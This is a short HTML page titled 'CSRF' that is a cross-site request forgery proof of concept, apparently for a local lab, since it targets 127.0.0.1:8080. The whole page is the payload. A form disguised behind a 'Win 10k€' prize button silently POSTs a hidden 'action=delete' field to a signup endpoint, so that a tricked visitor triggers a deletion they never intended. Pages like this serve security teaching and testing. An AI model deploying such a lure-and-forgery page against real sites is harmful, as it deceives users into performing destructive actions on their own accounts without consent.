<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <title>CSRF</title>
</head>
<body>
    <h1>BOOM!</h1>
    
    <form method="post" action="http://127.0.0.1:8080/signup/1">
        <input type="hidden" name="action" value="delete" />
        <input type="submit" value="Win 10k€" />
    </form>
</body>
</html>